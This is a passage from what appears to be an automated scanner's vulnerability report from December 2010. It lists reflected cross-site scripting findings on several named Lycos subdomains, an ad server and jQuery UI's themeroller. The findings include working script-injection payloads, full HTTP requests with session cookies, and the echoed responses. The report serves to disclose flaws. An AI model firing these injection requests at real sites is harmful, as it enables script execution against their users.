The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c84"style%3d"x%3aexpression(alert(1))"9dccb822702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13c84"style="x:expression(alert(1))"9dccb822702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/itunes-music-store-1414?13c84"style%3d"x%3aexpression(alert(1))"9dccb822702=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44865
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&13c84"style="x:expression(alert(1))"9dccb822702=1"> ...[SNIP]...
3.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/stores/walmart-321
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0561"style="x:expression(alert(1))"97f7932e4ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/walmart-321?a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:46 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47100
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&a0561"style="x:expression(alert(1))"97f7932e4ff=1"> ...[SNIP]...
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a5a5'%3balert(1)//7777e16fd16 was submitted in the redir parameter. This input was echoed as 4a5a5';alert(1)//7777e16fd16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=311&inv_code=cm.idg_b2c&size=728x90&referrer=http%3A%2F%2Fshopping.lycos.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-6268295_1292163909%2C%2Cshop%2C%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D980870%3Bcontx%3Dshop%3Ban%3D{PRICEBUCKET}%3Bdc%3Dd%3Bbtg%3D%3Bord%3D5266572%3F4a5a5'%3balert(1)//7777e16fd16 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://shopping.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid2=1253520181866309356; icu=EAAYAA..; acb244106=5_[r^kI/7ZI!97E0nf8MG#ngg?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgP4AtEUe-YV1k7KbsxvZlZREt2wRNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADrHzp9&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292163885%29%3Buf%28%27r%27%2C+114384%2C+1292163885%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2811%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2887%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28619%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28620%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28621%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; sess=1; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTSHJTy]F]k($WNwJP'.<5sLEKRldcpNp)Ec(kJ6st'z3Uv2?!F?0<:.kuRsX$mCQui>4M`J`y*aOn9LJHv?jDa''Df?dw]@K3NPeORWrK5v*s0045+'v.Jg1BCTjbtb.(7Yo>`<xZkofNI5StD5bqM=kN.BbMwKNO7wJ?G+_W?^@>wr?4/0viQZwz3N4Erbd<u$`O`Fg>TW*rP!?5iWVO-@k
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb244106=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Sat, 12-Mar-2011 14:28:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb7262=5_[r^kI/7ZI!97E0nf8M>yz4N?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgPwols7zZIRBB7KbsxvZlZREU3ARNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADXH3V5&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292164116%29%3Buf%28%27r%27%2C+114384%2C+1292164116%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2811%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2887%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28619%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28620%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28621%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sun, 12 Dec 2010 14:28:36 GMT Content-Length: 365
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c59d"><script>alert(1)</script>b1e138b458a was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi&cat=images9c59d"><script>alert(1)</script>b1e138b458a HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:05 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info</title ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_images9c59d"><script>alert(1)</script>b1e138b458a&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4a7"><script>alert(1)</script>abc7cf3bcbf was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&cat=images HTTP/1.1 Host: info.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info</title ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
3.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://info.lycos.com
Path:
/tos.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327d3"><script>alert(1)</script>739d92ba30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tos.php/327d3"><script>alert(1)</script>739d92ba30c HTTP/1.1 Host: info.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163891850882
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 91442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <a href="/tos.php/327d3"><script>alert(1)</script>739d92ba30c#acceptance"> ...[SNIP]...
3.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.lycos.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ade7"style="x:expression(alert(1))"6cec803882f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search?2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f=1 HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161724686; path=/ Date: Sun, 12 Dec 2010 14:34:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: LycosJobs=num82irdh4ljeo4nnvsi6bqqo5; expires=Sun, 12 Dec 2010 15:34:34 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/ Set-Cookie: diktfc=20F93AF4482D6F2C33F3F1B215794291BCD892461E6A; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/jobs/search?pn=2&2ade7"style="x:expression(alert(1))"6cec803882f=1&q="> ...[SNIP]...
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 was submitted in the x parameter. This input was echoed as b25f3"style="x:expression(alert(1))"8e6083360e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search?x=1b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 HTTP/1.1 Host: jobs.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161729042; path=/ Date: Sun, 12 Dec 2010 14:34:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: LycosJobs=4dq7os30hes5qg14m1sf1m0oc1; expires=Sun, 12 Dec 2010 15:34:36 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/ Set-Cookie: diktfc=FA178DC2496B1980044763822ACABD48B570396C18E7; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62539
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/jobs/search?pn=2&x=1b25f3"style="x:expression(alert(1))"8e6083360e1&q="> ...[SNIP]...
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10fbb"><script>alert(1)</script>21f65dae1a0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7317f"><script>alert(1)</script>b5f47834e30 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69061"><script>alert(1)</script>1a694a592e7 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c43"><script>alert(1)</script>a36a3b5f95c was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 